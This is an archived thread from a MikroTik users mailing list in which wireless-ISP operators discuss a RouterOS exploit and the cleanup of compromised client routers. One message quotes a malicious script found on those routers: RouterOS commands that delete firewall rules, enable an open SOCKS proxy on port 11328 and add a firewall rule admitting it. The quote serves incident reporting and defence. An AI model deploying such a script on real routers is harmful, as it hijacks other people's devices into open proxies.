Yep. Busy. Busy. We’re doing the same thing. Zipping things up tight.
73 -- Bob Pensworth, WA7BOB | General Manager <http://www.crescommwifi.com/> CresComm WiFi, LLC | (360) 928-0000, x1 From: Shawn C. Peppers <[email protected]> Sent: Sunday, August 5, 2018 9:06 PM To: Bob Pensworth <[email protected]> Cc: Mikrotik Users <[email protected]> Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 Been cleaning this up for random clients daily now....hence the reason i am very strongly voicing zero open ports (except l2tp and ipsec) to the outside network... :: // Shawn Peppers :: // DirectlinkAdmin.com <http://DirectlinkAdmin.com> On Aug 5, 2018, at 7:57 PM, Bob Pensworth <[email protected] <mailto:[email protected]> > wrote: We are finding an IP/Socks connection: We are finding an event entry in System/Scheduler And the (below) script in System/Script: /ip firewall filter remove [/ip firewall filter find where comment ~ "port [0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 connection-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=11328 action=accept comment="port 11328";/ip firewall filter move [/ip firewall filter find comment="port 11328"] 1; -- Bob Pensworth, WA7BOB | General Manager <http://www.crescommwifi.com/> CresComm WiFi, LLC | (360) 928-0000, x1 From: [email protected] <mailto:[email protected]> <[email protected] <mailto:[email protected]> > On Behalf Of Shawn C. Peppers via Mikrotik-users Sent: Friday, March 16, 2018 11:54 AM To: [email protected] <mailto:[email protected]> ; [email protected] <mailto:[email protected]> Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 I have not tested this yet but.... https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow :: // Shawn Peppers :: // DirectlinkAdmin.com <http://DirectlinkAdmin.com>
_______________________________________________ Mikrotik-users mailing list [email protected] http://lists.wispa.org/mailman/listinfo/mikrotik-users
